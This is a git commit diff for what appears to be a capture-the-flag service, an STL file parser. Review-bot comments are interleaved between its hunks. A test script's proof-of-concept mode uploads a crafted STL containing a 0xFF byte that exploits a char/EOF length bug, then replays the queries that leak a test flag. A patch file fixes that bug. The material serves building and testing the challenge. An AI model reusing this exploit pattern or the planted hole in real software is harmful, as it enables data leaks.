From 16b3dff93e5d1096174749e1b809728f585d95fb Mon Sep 17 00:00:00 2001 
From: Louis Burda Date: Wed, 19 May 2021 13:48:31 +0200 Subject: refactored service structure and added do.sh for automation --- service/.dockerignore | 1 + service/.gitignore | 1 + service/Dockerfile | 24 ------- service/cleaner.sh | 19 ------ service/container/.gitignore | 1 + service/container/Dockerfile | 24 +++++++ service/container/cleaner.sh | 19 ++++++ service/container/data/lastclean | 0 service/container/docker-compose.yml | 8 +++ service/container/entrypoint.sh | 14 +++++ service/do.sh | 46 ++++++++++++++ service/docker-compose.yml | 8 --- service/entrypoint.sh | 14 ----- service/patches/flagstore1.diff | 15 +++++ service/src/test.sh | 119 ----------------------------------- service/src/tests/evil1.stl | 9 --- service/src/tests/flag1.stl | 16 ----- service/src/tests/sample-ascii.stl | 16 ----- service/src/tests/sample-binary.stl | Bin 134 -> 0 bytes service/src/util.c | 3 +- service/tests/data/evil1.stl | 9 +++ service/tests/data/flag1.stl | 16 +++++ service/tests/data/sample-ascii.stl | 16 +++++ service/tests/data/sample-binary.stl | Bin 0 -> 134 bytes service/tests/test.sh | 119 +++++++++++++++++++++++++++++++++++ 25 files changed, 290 insertions(+), 227 deletions(-) create mode 100644 service/.dockerignore delete mode 100644 service/Dockerfile delete mode 100644 service/cleaner.sh create mode 100644 service/container/.gitignore create mode 100644 service/container/Dockerfile create mode 100644 service/container/cleaner.sh create mode 100644 service/container/data/lastclean create mode 100644 service/container/docker-compose.yml create mode 100755 service/container/entrypoint.sh create mode 100644 service/do.sh delete mode 100644 service/docker-compose.yml delete mode 100755 service/entrypoint.sh create mode 100644 service/patches/flagstore1.diff delete mode 100644 service/src/test.sh delete mode 100644 service/src/tests/evil1.stl delete mode 100644 service/src/tests/flag1.stl delete mode 100644 service/src/tests/sample-ascii.stl delete mode 100644 
service/src/tests/sample-binary.stl create mode 100644 service/tests/data/evil1.stl create mode 100644 service/tests/data/flag1.stl create mode 100644 service/tests/data/sample-ascii.stl create mode 100644 service/tests/data/sample-binary.stl create mode 100644 service/tests/test.sh (limited to 'service') diff --git a/service/.dockerignore b/service/.dockerignore new file mode 100644 index 0000000..4baccb8 --- /dev/null +++ b/service/.dockerignore @@ -0,0 +1 @@ +patches diff --git a/service/.gitignore b/service/.gitignore index 2421b49..648ea81 100644 --- a/service/.gitignore +++ b/service/.gitignore @@ -1,2 +1,3 @@ data/* !data/.keep +.cleansrc diff --git a/service/Dockerfile b/service/Dockerfile deleted file mode 100644 index e987831..0000000 --- a/service/Dockerfile +++ /dev/null @@ -1,24 +0,0 @@ -FROM ubuntu:18.04 - -RUN apt update && apt install -y --no-install-recommends socat build-essential - -RUN addgroup --system service -RUN adduser --system --ingroup service --uid 1000 service - -RUN mkdir /data - -COPY entrypoint.sh / -RUN chmod +x /entrypoint.sh - -COPY cleaner.sh / -RUN chmod +x /cleaner.sh - -COPY src/ /service/ - -WORKDIR /service/ -RUN make clean && make - -EXPOSE 9000 -ENV RESULTDIR=/data/scans - -ENTRYPOINT ["/entrypoint.sh"] diff --git a/service/cleaner.sh b/service/cleaner.sh deleted file mode 100644 index 2882608..0000000 --- a/service/cleaner.sh +++ /dev/null @@ -1,19 +0,0 @@ -#!/bin/sh - -timeref="/data/lastclean" - -if [ -z "$RESULTDIR" ]; then - echo "RESULTDIR is undefined! skipping cleanup.." - exit 1 -fi - -if [ -f "$timeref" ]; then - files="$(find "$RESULTDIR" -mindepth 1 \! -newer "$timeref")" - echo "$files" | while read path; do - rm -rf "$path" - done - echo "[ $(date +%T) ] Removed $(echo -n "$files" | wc -l) old files!" -fi - -touch "$timeref" - diff --git a/service/container/.gitignore b/service/container/.gitignore new file mode 100644 index 0000000..8eba6c8 --- /dev/null +++ b/service/container/.gitignore @@ -0,0 +1 @@ +src/ 
diff --git a/service/container/Dockerfile b/service/container/Dockerfile new file mode 100644 index 0000000..e987831 --- /dev/null +++ b/service/container/Dockerfile @@ -0,0 +1,24 @@ +FROM ubuntu:18.04 + +RUN apt update && apt install -y --no-install-recommends socat build-essential + +RUN addgroup --system service +RUN adduser --system --ingroup service --uid 1000 service + +RUN mkdir /data + +COPY entrypoint.sh / +RUN chmod +x /entrypoint.sh + +COPY cleaner.sh / +RUN chmod +x /cleaner.sh + +COPY src/ /service/ + +WORKDIR /service/ +RUN make clean && make + +EXPOSE 9000 +ENV RESULTDIR=/data/scans + +ENTRYPOINT ["/entrypoint.sh"] diff --git a/service/container/cleaner.sh b/service/container/cleaner.sh new file mode 100644 index 0000000..2882608 --- /dev/null +++ b/service/container/cleaner.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +timeref="/data/lastclean" + +if [ -z "$RESULTDIR" ]; then + echo "RESULTDIR is undefined! skipping cleanup.." + exit 1 +fi + +if [ -f "$timeref" ]; then + files="$(find "$RESULTDIR" -mindepth 1 \! -newer "$timeref")" + echo "$files" | while read path; do + rm -rf "$path" + done + echo "[ $(date +%T) ] Removed $(echo -n "$files" | wc -l) old files!" +fi + +touch "$timeref" + diff --git a/service/container/data/lastclean b/service/container/data/lastclean new file mode 100644 index 0000000..e69de29 diff --git a/service/container/docker-compose.yml b/service/container/docker-compose.yml new file mode 100644 index 0000000..56ecc9f --- /dev/null +++ b/service/container/docker-compose.yml @@ -0,0 +1,8 @@ +version: '3' +services: + printdoc: + build: . + volumes: + - ./data/:/data:rw + ports: + - "9000:9000" diff --git a/service/container/entrypoint.sh b/service/container/entrypoint.sh new file mode 100755 index 0000000..956c747 --- /dev/null +++ b/service/container/entrypoint.sh 
@@ -0,0 +1,14 @@ +#!/bin/sh + +chown -R service:service "/data/" + +mkdir -p "$RESULTDIR" + +while [ 1 ]; do + /cleaner.sh + sleep 180 +done & + +servicecmd='socat -T30 -s TCP-LISTEN:9000,reuseaddr,fork EXEC:"/service/stldoctor",raw,pty,echo=0,stderr' + +su -s /bin/sh -c "$servicecmd" service diff --git a/service/do.sh b/service/do.sh new file mode 100644 index 0000000..2dfd82c --- /dev/null +++ b/service/do.sh @@ -0,0 +1,46 @@ +#!/bin/sh + +SCRIPTPATH="$(dirname $(readlink -f "$0"))" +cd "$SCRIPTPATH" + +makefile=" +all: .cleansrc + +.cleansrc: src/* + bash do.sh cleansrc src container/src + touch .cleansrc +" + +shopt -s expand_aliases +alias pushd="pushd &>/dev/null" +alias popd="popd &>/dev/null" + +if [ "$1" == "compose" ]; then + # ensure container files are up to date + make --file <(echo "$makefile") + + # forward commands to compose + pushd container + docker-compose ${@:2} + popd +elif [ "$1" == "cleansrc" ]; then + # copy files + src="$2" + dst="$3" + [ -e "$dst" ] && rm -rf "$dst" + cp -r "$src" "$dst" + + # strip comments + find "$dst" | while read path; do + if [ -f "$path" ]; then + sed -i -e 's/^\s*\/\*.*\*\/\s*$//g' "$path" # remove /* */ style comments + sed -i -e 's/\s*\/\*.*\*\/\s*/ /g' "$path" # remove /* */ style comments + sed -i -e 's/\/\/.*//g' "$path" # remove // style comments + sed -i -e ':a;N;$!ba;s/\n{2,}/\n/g' "$path" # collapse multiple newlines + fi + done +else + echo "USAGE: do.sh (compose) [args..]" + echo "EXAMPLES:" + echo " do.sh compose up --build # starts the docker container" +fi diff --git a/service/docker-compose.yml b/service/docker-compose.yml deleted file mode 100644 index 56ecc9f..0000000 --- a/service/docker-compose.yml +++ /dev/null @@ -1,8 +0,0 @@ -version: '3' -services: - printdoc: - build: . - volumes: - - ./data/:/data:rw - ports: - - "9000:9000" diff --git a/service/entrypoint.sh b/service/entrypoint.sh deleted file mode 100755 index 956c747..0000000 --- a/service/entrypoint.sh +++ /dev/null 
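Review bot: In service/do.sh the `cleansrc` branch only strips a `/* ... */` comment that opens and closes on one line, so a block comment spanning several lines is copied into `container/src` unchanged; if this step is meant to keep source comments out of the built image, that gap defeats it. The `s/\/\/.*//g` rule errs the other way and also cuts any `//` inside a string literal, so the stripped tree can behave differently from `src/`. In sed's default basic syntax `\n{2,}` is not an interval (that needs `\n\{2,\}` or `-E`), so the blank-line collapse likely never matches. Separately, the script is `#!/bin/sh` but uses `shopt`, `pushd`, `<(...)`, `==` and `${@:2}`; I would make the shebang `#!/bin/bash` and forward arguments as `docker-compose "${@:2}"` so they are not re-split.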
@@ -1,14 +0,0 @@ -#!/bin/sh - -chown -R service:service "/data/" - -mkdir -p "$RESULTDIR" - -while [ 1 ]; do - /cleaner.sh - sleep 180 -done & - -servicecmd='socat -T30 -s TCP-LISTEN:9000,reuseaddr,fork EXEC:"/service/stldoctor",raw,pty,echo=0,stderr' - -su -s /bin/sh -c "$servicecmd" service diff --git a/service/patches/flagstore1.diff b/service/patches/flagstore1.diff new file mode 100644 index 0000000..c307b3e --- /dev/null +++ b/service/patches/flagstore1.diff @@ -0,0 +1,15 @@ +diff --git a/service/src/util.c b/service/src/util.c +--- a/service/src/util.c ++++ b/service/src/util.c +@@ -75,10 +75,9 @@ void + freadstr(FILE *f, char **dst) + { + size_t start, len; +- char c; + + start = ftell(f); +- for (len = 0; (c = fgetc(f)) != EOF && c; len++); ++ for (len = 0; fgetc(f) > 0; len++); + fseek(f, start, SEEK_SET); + + *dst = checkp(calloc(1, len + 1)); diff --git a/service/src/test.sh b/service/src/test.sh deleted file mode 100644 index 69e3ea1..0000000 --- a/service/src/test.sh +++ /dev/null 
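Review bot: The patch added as service/patches/flagstore1.diff removes `char c;` and the `(c = fgetc(f)) != EOF && c` loop, but this same commit makes the identical edit to service/src/util.c, so the lines the patch expects to delete are no longer in the tree and it will not apply against `src/`. If `patches/` is meant to hold the reference fix apart from the shipped source (it is excluded through `.dockerignore`), one of the two changes is presumably unintended; worth confirming which before merging.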
@@ -1,119 +0,0 @@ -#!/bin/sh - -set -e - -# RUNTYPE=1 - -SCRIPTPATH="$(dirname $(readlink -f "$0"))" -cd "$SCRIPTPATH" - -export RESULTDIR="../data/scans" -export ECHO_INPUT=1 - -announce() { - count=$(echo "$1" | wc -c) - python3 -c " -import math -s = '$1' -c = 80 -print() -print('#'*c) -print('#' + ' '*math.floor((c - len(s))/2-1) + s + ' '*math.ceil((c - len(s))/2-1) + '#') -print('#'*c) -print() - " -} - -checkleaks() { - valgrind --leak-check=full ./stldoctor 2>&1 | tee /tmp/testlog - if [ -z "$(grep "no leaks are possible" /tmp/testlog)" ]; then - echo "Valgrind exited with errors!" - exit 1 - fi -} - -connect() { - if [ "$RUNTYPE" == "remote" ]; then - nc localhost 9000 - elif [ "$RUNTYPE" == "debug" ]; then - checkleaks - else - ./stldoctor - fi -} - -if [ "$1" == "stl" ]; then - - announce "Testing ASCII STL Parsing" - ( - echo "echo" - echo "submit" - cat tests/sample-ascii.stl | wc -c - cat tests/sample-ascii.stl - echo "ASCII-testname" - ) | checkleaks - - announce "Testing BIN STL Parsing" - ( - echo "echo" - echo "submit" - cat tests/sample-binary.stl | wc -c - cat tests/sample-binary.stl - echo "BIN-testname" - ) | checkleaks - -elif [ "$1" == "poc" ]; then - - announce "Testing Proof-Of-Concept" - - [ ! -z "$RESULTDIR" ] && rm -rf "$RESULTDIR"/* - - echo -e "\n--- Uploading target STL ---\n" 1>&2 - ( - echo "echo" - echo "submit" - cat tests/flag1.stl | wc -c - cat tests/flag1.stl - echo "N0TaFL4G" - echo "exit" - ) | connect - - echo -e "\n--- Uploading evil STL ---\n" 1>&2 - ( - echo "echo" - echo "submit" - cat tests/evil1.stl | wc -c - cat tests/evil1.stl - echo "EV1L" - echo "exit" - ) | connect - - echo -e "\n--- Testing Exploit ---\n" 1>&2 - ( - echo "echo" - - # try index 0 - echo "query" - echo "EV1L" - echo "0" - echo "n" - - echo "query last" - echo "0" - echo "n" - - # try index 1 - echo "query" - echo -e "EV1L" - echo "0" - echo "n" - - echo "query last" - echo "1" - echo "n" - echo "exit" - ) | connect - -else - connect -fi 
diff --git a/service/src/tests/evil1.stl b/service/src/tests/evil1.stl deleted file mode 100644 index 706e9e2..0000000 --- a/service/src/tests/evil1.stl +++ /dev/null @@ -1,9 +0,0 @@ -solid test˙ -facet normal 0 0 1.0 - outer loop - vertex 1 0 0 - vertex 1 1 0 - vertex 0 1 0 - endloop - endfacet -endsolid diff --git a/service/src/tests/flag1.stl b/service/src/tests/flag1.stl deleted file mode 100644 index f2a3854..0000000 --- a/service/src/tests/flag1.stl +++ /dev/null @@ -1,16 +0,0 @@ -solid ENO{TESTFLAG} - facet normal 1.0 0 0 - outer loop - vertex 0 1 0 - vertex 0 1 1 - vertex 0 0 1 - endloop - endfacet - facet normal 0 0 1.0 - outer loop - vertex 1 0 0 - vertex 1 1 0 - vertex 0 1 0 - endloop - endfacet -endsolid diff --git a/service/src/tests/sample-ascii.stl b/service/src/tests/sample-ascii.stl deleted file mode 100644 index e3c89ef..0000000 --- a/service/src/tests/sample-ascii.stl +++ /dev/null @@ -1,16 +0,0 @@ -solid test - facet normal 1.0 0 0 - outer loop - vertex 0 1 0 - vertex 0 1 1 - vertex 0 0 1 - endloop - endfacet - facet normal 0 0 1.0 - outer loop - vertex 1 0 0 - vertex 1 1 0 - vertex 0 1 0 - endloop - endfacet -endsolid test diff --git a/service/src/tests/sample-binary.stl b/service/src/tests/sample-binary.stl deleted file mode 100644 index 13c02e4..0000000 Binary files a/service/src/tests/sample-binary.stl and /dev/null differ diff --git a/service/src/util.c b/service/src/util.c index c53f92b..bf6e872 100644 --- a/service/src/util.c +++ b/service/src/util.c @@ -75,10 +75,9 @@ void freadstr(FILE *f, char **dst) { size_t start, len; - char c; start = ftell(f); - for (len = 0; (c = fgetc(f)) != EOF && c; len++); + for (len = 0; fgetc(f) > 0; len++); fseek(f, start, SEEK_SET); *dst = checkp(calloc(1, len + 1)); diff --git a/service/tests/data/evil1.stl b/service/tests/data/evil1.stl new file mode 100644 index 0000000..706e9e2 --- /dev/null +++ b/service/tests/data/evil1.stl 
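Review bot: The corrected loop condition `fgetc(f) > 0` in `freadstr` (service/src/util.c) carries no comment explaining the pitfall it removes: with the old `char c`, a 0xFF byte in the input compared equal to `EOF` where `char` is signed and ended the length scan early. I would add above the loop `/* keep fgetc()'s int result: narrowing to char makes byte 0xFF look like EOF */` so the narrowing is not reintroduced later. Still unaddressed in the context lines, `start = ftell(f);` stores a `long` that is -1 on failure into a `size_t` and the following `fseek` is unchecked, so a failed or non-seekable stream yields a bogus rewind offset; `long start = ftell(f);` with a `start < 0` check would close that. The rest of the function lies outside the hunk, so how `len` is used after the `calloc` is not visible here.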
@@ -0,0 +1,9 @@ +solid test˙ +facet normal 0 0 1.0 + outer loop + vertex 1 0 0 + vertex 1 1 0 + vertex 0 1 0 + endloop + endfacet +endsolid diff --git a/service/tests/data/flag1.stl b/service/tests/data/flag1.stl new file mode 100644 index 0000000..f2a3854 --- /dev/null +++ b/service/tests/data/flag1.stl @@ -0,0 +1,16 @@ +solid ENO{TESTFLAG} + facet normal 1.0 0 0 + outer loop + vertex 0 1 0 + vertex 0 1 1 + vertex 0 0 1 + endloop + endfacet + facet normal 0 0 1.0 + outer loop + vertex 1 0 0 + vertex 1 1 0 + vertex 0 1 0 + endloop + endfacet +endsolid diff --git a/service/tests/data/sample-ascii.stl b/service/tests/data/sample-ascii.stl new file mode 100644 index 0000000..e3c89ef --- /dev/null +++ b/service/tests/data/sample-ascii.stl @@ -0,0 +1,16 @@ +solid test + facet normal 1.0 0 0 + outer loop + vertex 0 1 0 + vertex 0 1 1 + vertex 0 0 1 + endloop + endfacet + facet normal 0 0 1.0 + outer loop + vertex 1 0 0 + vertex 1 1 0 + vertex 0 1 0 + endloop + endfacet +endsolid test diff --git a/service/tests/data/sample-binary.stl b/service/tests/data/sample-binary.stl new file mode 100644 index 0000000..13c02e4 Binary files /dev/null and b/service/tests/data/sample-binary.stl differ diff --git a/service/tests/test.sh b/service/tests/test.sh new file mode 100644 index 0000000..69e3ea1 --- /dev/null +++ b/service/tests/test.sh 
@@ -0,0 +1,119 @@ +#!/bin/sh + +set -e + +# RUNTYPE=1 + +SCRIPTPATH="$(dirname $(readlink -f "$0"))" +cd "$SCRIPTPATH" + +export RESULTDIR="../data/scans" +export ECHO_INPUT=1 + +announce() { + count=$(echo "$1" | wc -c) + python3 -c " +import math +s = '$1' +c = 80 +print() +print('#'*c) +print('#' + ' '*math.floor((c - len(s))/2-1) + s + ' '*math.ceil((c - len(s))/2-1) + '#') +print('#'*c) +print() + " +} + +checkleaks() { + valgrind --leak-check=full ./stldoctor 2>&1 | tee /tmp/testlog + if [ -z "$(grep "no leaks are possible" /tmp/testlog)" ]; then + echo "Valgrind exited with errors!" + exit 1 + fi +} + +connect() { + if [ "$RUNTYPE" == "remote" ]; then + nc localhost 9000 + elif [ "$RUNTYPE" == "debug" ]; then + checkleaks + else + ./stldoctor + fi +} + +if [ "$1" == "stl" ]; then + + announce "Testing ASCII STL Parsing" + ( + echo "echo" + echo "submit" + cat tests/sample-ascii.stl | wc -c + cat tests/sample-ascii.stl + echo "ASCII-testname" + ) | checkleaks + + announce "Testing BIN STL Parsing" + ( + echo "echo" + echo "submit" + cat tests/sample-binary.stl | wc -c + cat tests/sample-binary.stl + echo "BIN-testname" + ) | checkleaks + +elif [ "$1" == "poc" ]; then + + announce "Testing Proof-Of-Concept" + + [ ! 
-z "$RESULTDIR" ] && rm -rf "$RESULTDIR"/* + + echo -e "\n--- Uploading target STL ---\n" 1>&2 + ( + echo "echo" + echo "submit" + cat tests/flag1.stl | wc -c + cat tests/flag1.stl + echo "N0TaFL4G" + echo "exit" + ) | connect + + echo -e "\n--- Uploading evil STL ---\n" 1>&2 + ( + echo "echo" + echo "submit" + cat tests/evil1.stl | wc -c + cat tests/evil1.stl + echo "EV1L" + echo "exit" + ) | connect + + echo -e "\n--- Testing Exploit ---\n" 1>&2 + ( + echo "echo" + + # try index 0 + echo "query" + echo "EV1L" + echo "0" + echo "n" + + echo "query last" + echo "0" + echo "n" + + # try index 1 + echo "query" + echo -e "EV1L" + echo "0" + echo "n" + + echo "query last" + echo "1" + echo "n" + echo "exit" + ) | connect + +else + connect +fi -- cgit v1.2.3-71-gd317
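Review bot: service/tests/test.sh is moved with its content unchanged, but it still does `cd "$SCRIPTPATH"` and then reads `tests/sample-ascii.stl`, `tests/flag1.stl` and the other fixtures and runs `./stldoctor`, none of which resolve from `service/tests/` after this commit (the fixtures are now under `tests/data/`, and the binary is presumably built under `src/`). The fixture paths should become e.g. `cat data/flag1.stl`, the binary location should come from a variable, and `RESULTDIR="../data/scans"` needs rechecking against the new `container/data/` layout. Also, `checkleaks` tees into the fixed path `/tmp/testlog`; a `mktemp` file would avoid clobbering or following a pre-existing file on a shared machine.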